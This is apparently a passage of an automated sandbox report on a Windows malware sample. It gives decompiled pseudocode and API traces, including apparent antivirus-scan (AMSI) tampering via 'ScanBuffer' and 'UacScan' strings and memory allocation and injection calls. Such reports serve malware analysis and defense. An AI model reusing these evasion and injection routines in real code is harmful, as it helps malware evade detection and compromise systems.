                                                                                                				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                                				if(_t44 == 0) {
                                                                                                					L3:
                                                                                                					_push(_t115);
                                                                                                					_push(0x2175e11);
                                                                                                					_push( *[fs:eax]);
                                                                                                					 *[fs:eax] = _t118;
                                                                                                					_v28 = 5;
                                                                                                					E02175B48( &_v289, 0x105);
                                                                                                					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E02175F78, 0, 0,  &_v22,  &_v28) != 0) {
                                                                                                						_v22 = 0;
                                                                                                					}
                                                                                                					_v18 = 0;
                                                                                                					_pop(_t104);
                                                                                                					 *[fs:eax] = _t104;
                                                                                                					_push(E02175E18);
                                                                                                					return RegCloseKey(_v12);
                                                                                                				} else {
                                                                                                					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                                					if(_t61 == 0) {
                                                                                                						goto L3;
                                                                                                					} else {
                                                                                                						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                                						if(_t63 != 0) {
                                                                                                							lstrcpynA( &_v289, _v8, 0x105);
                                                                                                							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5);
                                                                                                							_t112 = 0;
                                                                                                							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                                                                                								_t99 =  &(( &_v289)[lstrlenA( &_v289)]);
                                                                                                								while( *_t99 != 0x2e && _t99 !=  &_v289) {
                                                                                                									_t99 = _t99 - 1;
                                                                                                								}
                                                                                                								_t74 =  &_v289;
                                                                                                								if(_t99 != _t74) {
                                                                                                									_t100 =  &(_t99[1]);
                                                                                                									if(_v22 != 0) {
                                                                                                										lstrcpynA(_t100,  &_v22, 0x105 - _t100 - _t74);
                                                                                                										_t112 = LoadLibraryExA( &_v289, 0, 2);
                                                                                                									}
                                                                                                									if(_t112 == 0 && _v17 != 0) {
                                                                                                										lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
                                                                                                										_t112 = LoadLibraryExA( &_v289, 0, 2);
                                                                                                										if(_t112 == 0) {
                                                                                                											_v15 = 0;
                                                                                                											lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
                                                                                                											_t112 = LoadLibraryExA( &_v289, 0, 2);
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							return _t112;
                                                                                                						} else {
                                                                                                							goto L3;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}























                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02170000,021907B4), ref: 02175D28
                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02170000,021907B4), ref: 02175D46
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02170000,021907B4), ref: 02175D64
                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02175D82
                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02175E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02175DCB
                                                                                                • RegQueryValueExA.ADVAPI32(?,02175F78,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02175E11,?,80000001), ref: 02175DE9
                                                                                                • RegCloseKey.ADVAPI32(?,02175E18,00000000,?,?,00000000,02175E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02175E0B
                                                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02175E28
                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02175E35
                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02175E3B
                                                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02175E66
                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02175EAD
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02175EBD
                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02175EE5
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02175EF5
                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02175F1B
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02175F2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                • API String ID: 1759228003-2375825460
                                                                                                • Opcode ID: e695effeb28be790e893cf2a72e2dcd2b608f35c2da384c9952f218932cb7d13
                                                                                                • Instruction ID: d8b6b3f297cd2f662b9e6c92bc0759af69f4806d45174505deace2d9da629096
                                                                                                • Opcode Fuzzy Hash: e695effeb28be790e893cf2a72e2dcd2b608f35c2da384c9952f218932cb7d13
                                                                                                • Instruction Fuzzy Hash: C4514671AC025C7EFB21D6A4CC46FEFB7BEDB94744F9001A1AA04E61C1EB749A448F60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph (nodes 3353-3887, 2186388-218768d): edge list omitted. Named API calls in the graph nodes: InetIsOffline (21863c6-21863ce); VirtualAlloc, GetProcAddress, FreeLibrary, LoadLibraryA, VirtualProtect (21863ea-2186a9f); VirtualAlloc (2186cc6-2186ec4); VirtualProtect, FreeLibrary (21875f3-2187647).
                                                                                                C-Code - Quality: 61%
                                                                                                			E02186388() {
                                                                                                				char _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _t7;
                                                                                                				void* _t9;
                                                                                                				intOrPtr _t16;
                                                                                                				intOrPtr _t24;
                                                                                                
                                                                                                				_t16 = 0x47;
                                                                                                				do {
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_t16 = _t16 - 1;
                                                                                                				} while (_t16 != 0);
                                                                                                				_t1 =  &_v8;
                                                                                                				 *_t1 = _t16;
                                                                                                				_v12 =  *_t1;
                                                                                                				_v8 = _t7;
                                                                                                				_push(0x218768e);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t24;
                                                                                                				 *0x0000270E =  *0x0000270E & 0x02194598;
                                                                                                				_t9 = E0217304C(0);
                                                                                                				_push(_t9);
                                                                                                				L021858FC();
                                                                                                				if(_t9 == 0) {
                                                                                                					asm("sbb [edx], al");
                                                                                                					E021748F4(0x2194598, 0x21876b8);
                                                                                                					L8:
                                                                                                					_push(0x21876c4);
                                                                                                				}
                                                                                                				E021748F4(0x2194598, 0x21876a8);
                                                                                                				goto L8;
                                                                                                			}










                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,0218768E,?,?,?,?,00000000,00000000), ref: 021863C7
                                                                                                  • Part of subcall function 02183690: LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                  • Part of subcall function 02183690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                  • Part of subcall function 02183690: GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                  • Part of subcall function 02183690: RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                  • Part of subcall function 02183690: GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                  • Part of subcall function 02183690: NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                  • Part of subcall function 02183690: FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                • VirtualAlloc.KERNEL32(-01D94524,00029000,00003000,00000040,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4), ref: 0218658A
                                                                                                  • Part of subcall function 0217CAC8: SetErrorMode.KERNEL32 ref: 0217CAD2
                                                                                                  • Part of subcall function 0217CAC8: LoadLibraryA.KERNEL32(00000000,00000000,0217CB1C,?,00000000,0217CB3A), ref: 0217CB01
                                                                                                • GetProcAddress.KERNEL32(76670000,VirtualAlloc), ref: 021866DD
                                                                                                • FreeLibrary.KERNEL32(76670000,76670000,VirtualAlloc,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4,UacScan,02194598,021876C4,-01D94524,00029000,00003000,00000040), ref: 021866ED
                                                                                                • VirtualAlloc.KERNEL32(10410000,00000200,00001000,00000004,76670000,76670000,VirtualAlloc,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4,UacScan,02194598,021876C4), ref: 02186708
                                                                                                • LoadLibraryA.KERNEL32(kernel32,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4,UacScan,02194598,021876C4), ref: 0218687B
                                                                                                • GetProcAddress.KERNEL32(76670000,VirtualProtect), ref: 02186890
                                                                                                • VirtualProtect.KERNEL32(10411000,00000200,00000002,02194554,76670000,VirtualProtect,kernel32,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4,UacScan,02194598,021876C4), ref: 021868B0
                                                                                                • VirtualAlloc.KERNEL32(-02193538,00027C00,00001000,00000004,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4,OpenSession,02194598,021876C4,ScanBuffer,02194598,021876C4), ref: 02186DCB
                                                                                                  • Part of subcall function 02185F6C: InetIsOffline.URL(00000000,00000000,02186329,?,?,?,?,0000000C,00000000,00000000), ref: 02185FA4
                                                                                                • VirtualProtect.KERNEL32(-02193538,00027B6C,00000000,02194554,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4), ref: 02187633
                                                                                                • FreeLibrary.KERNEL32(76670000), ref: 0218763F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryVirtual$AddressAllocFreeLoadProc$InetMemoryOfflineProtect$CurrentErrorFlushHandleModeModuleMoveProcess
                                                                                                • String ID: OpenSession$ScanBuffer$UacScan$VirtualAlloc$VirtualProtect$kernel32$teSe
                                                                                                • API String ID: 3418975139-2221745942
                                                                                                • Opcode ID: 23a1dda562b9a66cac775bc1f2b33199e08ab085f07e95d49f09b74fa2cd7e82
                                                                                                • Instruction ID: 09f64e217acb5fae456eea2d46b7d40be1e719f20bbf5ea7ac4537f2579822f3
                                                                                                • Opcode Fuzzy Hash: 23a1dda562b9a66cac775bc1f2b33199e08ab085f07e95d49f09b74fa2cd7e82
                                                                                                • Instruction Fuzzy Hash: E5B2FF39AC01199FEB21FB64D8C4EDEB7F6AF85700F2044E6A405AB254DB30AE46CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                [Figure: control-flow graph for the function at 0218779C; legend: Executed / Not Executed]
                                                                                                C-Code - Quality: 42%
                                                                                                			E0218779C(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                				char _v8;
                                                                                                				char _v9;
                                                                                                				char _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				char _v24;
                                                                                                				char _v28;
                                                                                                				char _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				char _v40;
                                                                                                				char _v44;
                                                                                                				char _v48;
                                                                                                				intOrPtr _v52;
                                                                                                				char _v56;
                                                                                                				char _v60;
                                                                                                				char _v64;
                                                                                                				intOrPtr _v68;
                                                                                                				char _v72;
                                                                                                				char _v76;
                                                                                                				char _v80;
                                                                                                				intOrPtr _v84;
                                                                                                				char _v88;
                                                                                                				char _v92;
                                                                                                				char _v96;
                                                                                                				intOrPtr _v100;
                                                                                                				char _v104;
                                                                                                				char _v108;
                                                                                                				char _v112;
                                                                                                				intOrPtr _v116;
                                                                                                				char _v120;
                                                                                                				char _v124;
                                                                                                				char _v128;
                                                                                                				intOrPtr _v132;
                                                                                                				char _v136;
                                                                                                				char _v140;
                                                                                                				char _v144;
                                                                                                				intOrPtr _v148;
                                                                                                				char _v152;
                                                                                                				char _v156;
                                                                                                				char _v160;
                                                                                                				intOrPtr _v164;
                                                                                                				char _v168;
                                                                                                				char _v172;
                                                                                                				char _v176;
                                                                                                				char _v180;
                                                                                                				intOrPtr _v184;
                                                                                                				char _v188;
                                                                                                				char _v192;
                                                                                                				char _v196;
                                                                                                				intOrPtr _v200;
                                                                                                				char _v204;
                                                                                                				char _v208;
                                                                                                				char _v212;
                                                                                                				intOrPtr _v216;
                                                                                                				char _v220;
                                                                                                				char _v224;
                                                                                                				char _v244;
                                                                                                				char _v248;
                                                                                                				intOrPtr _v252;
                                                                                                				char _v256;
                                                                                                				char _v260;
                                                                                                				char _v264;
                                                                                                				intOrPtr _v268;
                                                                                                				char _v272;
                                                                                                				char _v276;
                                                                                                				char _v280;
                                                                                                				intOrPtr _v284;
                                                                                                				char _v288;
                                                                                                				char _v292;
                                                                                                				char _v296;
                                                                                                				intOrPtr _v300;
                                                                                                				char _v304;
                                                                                                				char _v308;
                                                                                                				char _v312;
                                                                                                				intOrPtr _v316;
                                                                                                				char _v320;
                                                                                                				char _v324;
                                                                                                				char _v328;
                                                                                                				char _v332;
                                                                                                				intOrPtr _v336;
                                                                                                				char _v340;
                                                                                                				char _v344;
                                                                                                				char _v348;
                                                                                                				intOrPtr _v352;
                                                                                                				char _v356;
                                                                                                				char _v360;
                                                                                                				char _v364;
                                                                                                				intOrPtr _v368;
                                                                                                				char _v372;
                                                                                                				char _v376;
                                                                                                				char _v380;
                                                                                                				intOrPtr _v384;
                                                                                                				char _v388;
                                                                                                				char _v392;
                                                                                                				char _v396;
                                                                                                				intOrPtr _v400;
                                                                                                				char _v404;
                                                                                                				char _v408;
                                                                                                				void* __ecx;
                                                                                                				void* _t206;
                                                                                                				void* _t209;
                                                                                                				intOrPtr _t286;
                                                                                                				intOrPtr _t288;
                                                                                                				PVOID* _t291;
                                                                                                				void* _t387;
                                                                                                				intOrPtr _t402;
                                                                                                				struct HINSTANCE__* _t448;
                                                                                                				struct HINSTANCE__* _t449;
                                                                                                				struct HINSTANCE__* _t451;
                                                                                                				long _t453;
                                                                                                				void* _t454;
                                                                                                				long* _t529;
                                                                                                				long* _t530;
                                                                                                				struct HINSTANCE__* _t578;
                                                                                                				struct HINSTANCE__* _t579;
                                                                                                				struct HINSTANCE__* _t581;
                                                                                                				intOrPtr _t585;
                                                                                                				intOrPtr _t587;
                                                                                                				PVOID* _t590;
                                                                                                				void* _t593;
                                                                                                				intOrPtr _t596;
                                                                                                				intOrPtr _t609;
                                                                                                				void* _t631;
                                                                                                				void* _t636;
                                                                                                				void* _t641;
                                                                                                				void* _t647;
                                                                                                				void* _t652;
                                                                                                				void* _t657;
                                                                                                				void* _t662;
                                                                                                				void* _t667;
                                                                                                				void* _t672;
                                                                                                				void* _t677;
                                                                                                				intOrPtr _t680;
                                                                                                				intOrPtr _t682;
                                                                                                				void* _t688;
                                                                                                				void* _t693;
                                                                                                				void* _t698;
                                                                                                				void* _t703;
                                                                                                				void* _t708;
                                                                                                				void* _t715;
                                                                                                				void* _t720;
                                                                                                				void* _t725;
                                                                                                				void* _t730;
                                                                                                				void* _t735;
                                                                                                				void* _t741;
                                                                                                				void* _t746;
                                                                                                				void* _t751;
                                                                                                				void* _t755;
                                                                                                				void* _t756;
                                                                                                				void* _t757;
                                                                                                				intOrPtr _t760;
                                                                                                				intOrPtr _t761;
                                                                                                
                                                                                                				_t757 = __esi;
                                                                                                				_t755 = __edi;
                                                                                                				_t593 = __ebx;
                                                                                                				_t206 = __eax;
                                                                                                				_t760 = _t761;
                                                                                                				_t596 = 0x32;
                                                                                                				do {
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_t596 = _t596 - 1;
                                                                                                				} while (_t596 != 0);
                                                                                                				_t1 =  &_v8;
                                                                                                				 *_t1 = _t596;
                                                                                                				_push(_t593);
                                                                                                				_push(_t757);
                                                                                                				_push(_t755);
                                                                                                				_v8 =  *_t1;
                                                                                                				_t756 = _t206;
                                                                                                				_push(_t760);
                                                                                                				_push(0x2188401);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t761;
                                                                                                				_t209 = E0217304C(0x270e);
                                                                                                				_push(_t209);
                                                                                                				L021858FC();
                                                                                                				if(_t209 == 0) {
                                                                                                					E021748F4(0x2194598, 0x218842c);
                                                                                                				} else {
                                                                                                					E021748F4(0x2194598, 0x218841c);
                                                                                                				}
                                                                                                				_push(0x2188438);
                                                                                                				_push( *0x2194598);
                                                                                                				_push("Initialize");
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v16, E02174D64(_v20));
                                                                                                				_push(_v16);
                                                                                                				E02174BB0( &_v28,  *0x2194598, 0x2188438);
                                                                                                				E02174A98( &_v24, E02174D64(_v28));
                                                                                                				_pop(_t631); // executed
                                                                                                				E02183690(_v24, 0x2194598, _t631, 0x2194520); // executed
                                                                                                				_push(0x2188438);
                                                                                                				_push( *0x2194598);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v32, E02174D64(_v36));
                                                                                                				_push(_v32);
                                                                                                				E02174BB0( &_v44,  *0x2194598, 0x2188438);
                                                                                                				E02174A98( &_v40, E02174D64(_v44));
                                                                                                				_pop(_t636); // executed
                                                                                                				E02183690(_v40, 0x2194598, _t636, 0x2194520); // executed
                                                                                                				_push(0x2188438);
                                                                                                				_push( *0x2194598);
                                                                                                				_push("ScanBuffer");
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v48, E02174D64(_v52));
                                                                                                				_push(_v48);
                                                                                                				E02174BB0( &_v60,  *0x2194598, 0x2188438);
                                                                                                				E02174A98( &_v56, E02174D64(_v60));
                                                                                                				_pop(_t641); // executed
                                                                                                				E02183690(_v56, 0x2194598, _t641, 0x2194520); // executed
                                                                                                				_v9 = 0;
                                                                                                				_push(0);
                                                                                                				_push(_v8);
                                                                                                				asm("cdq");
                                                                                                				asm("adc edx, [esp+0x4]");
                                                                                                				 *0x219451c =  *((intOrPtr*)(_v8 + 0x3c)) + _v88;
                                                                                                				 *0x2194524 = 0x10000000;
                                                                                                				do {
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push(0x2188480);
                                                                                                					_push(0x218848c);
                                                                                                					_push(0x2188498);
                                                                                                					_push(0x21884a4);
                                                                                                					_push( *0x2194598);
                                                                                                					_push(0x21884b0);
                                                                                                					_push(0x21884bc);
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v64, E02174D64(_v68));
                                                                                                					_push(_v64);
                                                                                                					E02174BB0( &_v76,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v72, E02174D64(_v76));
                                                                                                					_pop(_t647); // executed
                                                                                                					E02183690(_v72, 0x2194598, _t647, 0x2194520); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v80, E02174D64(_v84));
                                                                                                					_push(_v80);
                                                                                                					E02174BB0( &_v92,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v88, E02174D64(_v92));
                                                                                                					_pop(_t652); // executed
                                                                                                					E02183690(_v88, 0x2194598, _t652, 0x2194520); // executed
                                                                                                					 *0x2194524 =  *0x2194524 + 0x10000;
                                                                                                					_t286 =  *0x219451c; // 0x4a7fda0
                                                                                                					_t48 = _t286 + 0x50; // 0x29000
                                                                                                					_t288 =  *0x219451c; // 0x4a7fda0
                                                                                                					_t49 = _t288 + 0x34; // 0x400000
                                                                                                					_t291 = VirtualAlloc( *_t49 +  *0x2194524,  *_t48, 0x3000, 0x40); // executed
                                                                                                					 *0x2194520 = _t291;
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("UacScan");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v96, E02174D64(_v100));
                                                                                                					_push(_v96);
                                                                                                					E02174BB0( &_v108,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v104, E02174D64(_v108));
                                                                                                					_pop(_t657); // executed
                                                                                                					E02183690(_v104, 0x2194598, _t657, 0x2194520); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v112, E02174D64(_v116));
                                                                                                					_push(_v112);
                                                                                                					E02174BB0( &_v124,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v120, E02174D64(_v124));
                                                                                                					_pop(_t662); // executed
                                                                                                					E02183690(_v120, 0x2194598, _t662, 0x2194520); // executed
                                                                                                					if( *0x2194520 != 0) {
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("Initialize");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v128, E02174D64(_v132));
                                                                                                						_push(_v128);
                                                                                                						E02174BB0( &_v140,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v136, E02174D64(_v140));
                                                                                                						_pop(_t741); // executed
                                                                                                						E02183690(_v136, 0x2194598, _t741, 0x2194520); // executed
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("OpenSession");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v144, E02174D64(_v148));
                                                                                                						_push(_v144);
                                                                                                						E02174BB0( &_v156,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v152, E02174D64(_v156));
                                                                                                						_pop(_t746); // executed
                                                                                                						E02183690(_v152, 0x2194598, _t746, 0x2194520); // executed
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("ScanBuffer");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v160, E02174D64(_v164));
                                                                                                						_push(_v160);
                                                                                                						E02174BB0( &_v172,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v168, E02174D64(_v172));
                                                                                                						_pop(_t751); // executed
                                                                                                						E02183690(_v168, 0x2194598, _t751, 0x2194520); // executed
                                                                                                						E02174A98( &_v176, "kernel32");
                                                                                                						_t578 = E0217CAC8(_v176, 0x2194598, 0x8000); // executed
                                                                                                						 *0x21945ac = _t578;
                                                                                                						_t579 =  *0x21945ac; // 0x76670000
                                                                                                						 *0x21945a4 = GetProcAddress(_t579, "VirtualFree");
                                                                                                						_t581 =  *0x21945ac; // 0x76670000
                                                                                                						FreeLibrary(_t581);
                                                                                                						VirtualFree( *0x2194520, 0, 0x8000); // executed
                                                                                                						_t585 =  *0x219451c; // 0x4a7fda0
                                                                                                						_t92 = _t585 + 0x50; // 0x29000
                                                                                                						_t587 =  *0x219451c; // 0x4a7fda0
                                                                                                						_t93 = _t587 + 0x34; // 0x400000
                                                                                                						_t590 = VirtualAllocEx(_t756,  *_t93 +  *0x2194524,  *_t92, 0x3000, 0x40); // executed
                                                                                                						 *0x2194520 = _t590;
                                                                                                					}
                                                                                                				} while ( *0x2194520 == 0 &&  *0x2194524 <= 0x30000000);
                                                                                                				_push(0x2188438);
                                                                                                				_push( *0x2194598);
                                                                                                				_push(0x2188480);
                                                                                                				_push(0x218848c);
                                                                                                				_push(0x2188498);
                                                                                                				_push(0x21884a4);
                                                                                                				_push( *0x2194598);
                                                                                                				_push(0x21884b0);
                                                                                                				_push(0x21884bc);
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v180, E02174D64(_v184));
                                                                                                				_push(_v180);
                                                                                                				E02174BB0( &_v192,  *0x2194598, 0x2188438);
                                                                                                				E02174A98( &_v188, E02174D64(_v192));
                                                                                                				_pop(_t667); // executed
                                                                                                				E02183690(_v188, 0x2194598, _t667, 0x2194520); // executed
                                                                                                				_push(0x2188438);
                                                                                                				_push( *0x2194598);
                                                                                                				_push("ScanBuffer");
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v196, E02174D64(_v200));
                                                                                                				_push(_v196);
                                                                                                				E02174BB0( &_v208,  *0x2194598, 0x2188438);
                                                                                                				E02174A98( &_v204, E02174D64(_v208));
                                                                                                				_pop(_t672); // executed
                                                                                                				E02183690(_v204, 0x2194598, _t672, 0x2194520); // executed
                                                                                                				_push(0x2188438);
                                                                                                				_push( *0x2194598);
                                                                                                				_push(0x2188480);
                                                                                                				_push(0x218848c);
                                                                                                				_push(0x2188498);
                                                                                                				_push(0x21884a4);
                                                                                                				_push( *0x2194598);
                                                                                                				_push(0x21884b0);
                                                                                                				_push(0x21884bc);
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v212, E02174D64(_v216));
                                                                                                				_push(_v212);
                                                                                                				E02174BB0( &_v224,  *0x2194598, 0x2188438);
                                                                                                				E02174A98( &_v220, E02174D64(_v224));
                                                                                                				_pop(_t677); // executed
                                                                                                				E02183690(_v220, 0x2194598, _t677, 0x2194520); // executed
                                                                                                				_push( &_v244);
                                                                                                				E02186388(); // executed
                                                                                                				_t609 =  *0x2185930; // 0x2185934
                                                                                                				E021755FC(0x21944fc, _t609,  &_v244);
                                                                                                				if( *0x21944fc != 0) {
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push(0x2188480);
                                                                                                					_push(0x218848c);
                                                                                                					_push(0x2188498);
                                                                                                					_push(0x21884a4);
                                                                                                					_push( *0x2194598);
                                                                                                					_push(0x21884b0);
                                                                                                					_push(0x21884bc);
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v248, E02174D64(_v252));
                                                                                                					_push(_v248);
                                                                                                					E02174BB0( &_v260,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v256, E02174D64(_v260));
                                                                                                					_pop(_t688); // executed
                                                                                                					E02183690(_v256, 0x2194598, _t688, 0x2194520);
                                                                                                					_t387 =  *0x21944fc; // 0x10410000
                                                                                                					 *0x2194510 = _t387;
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push(0x2188480);
                                                                                                					_push(0x218848c);
                                                                                                					_push(0x2188498);
                                                                                                					_push(0x21884a4);
                                                                                                					_push( *0x2194598);
                                                                                                					_push(0x21884b0);
                                                                                                					_push(0x21884bc);
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v264, E02174D64(_v268));
                                                                                                					_push(_v264);
                                                                                                					E02174BB0( &_v276,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v272, E02174D64(_v276));
                                                                                                					_pop(_t693); // executed
                                                                                                					E02183690(_v272, 0x2194598, _t693, 0x2194520);
                                                                                                					_t402 =  *0x2194508; // 0x1042d450
                                                                                                					 *0x2194514 = _t402;
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("Initialize");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v280, E02174D64(_v284));
                                                                                                					_push(_v280);
                                                                                                					E02174BB0( &_v292,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v288, E02174D64(_v292));
                                                                                                					_pop(_t698); // executed
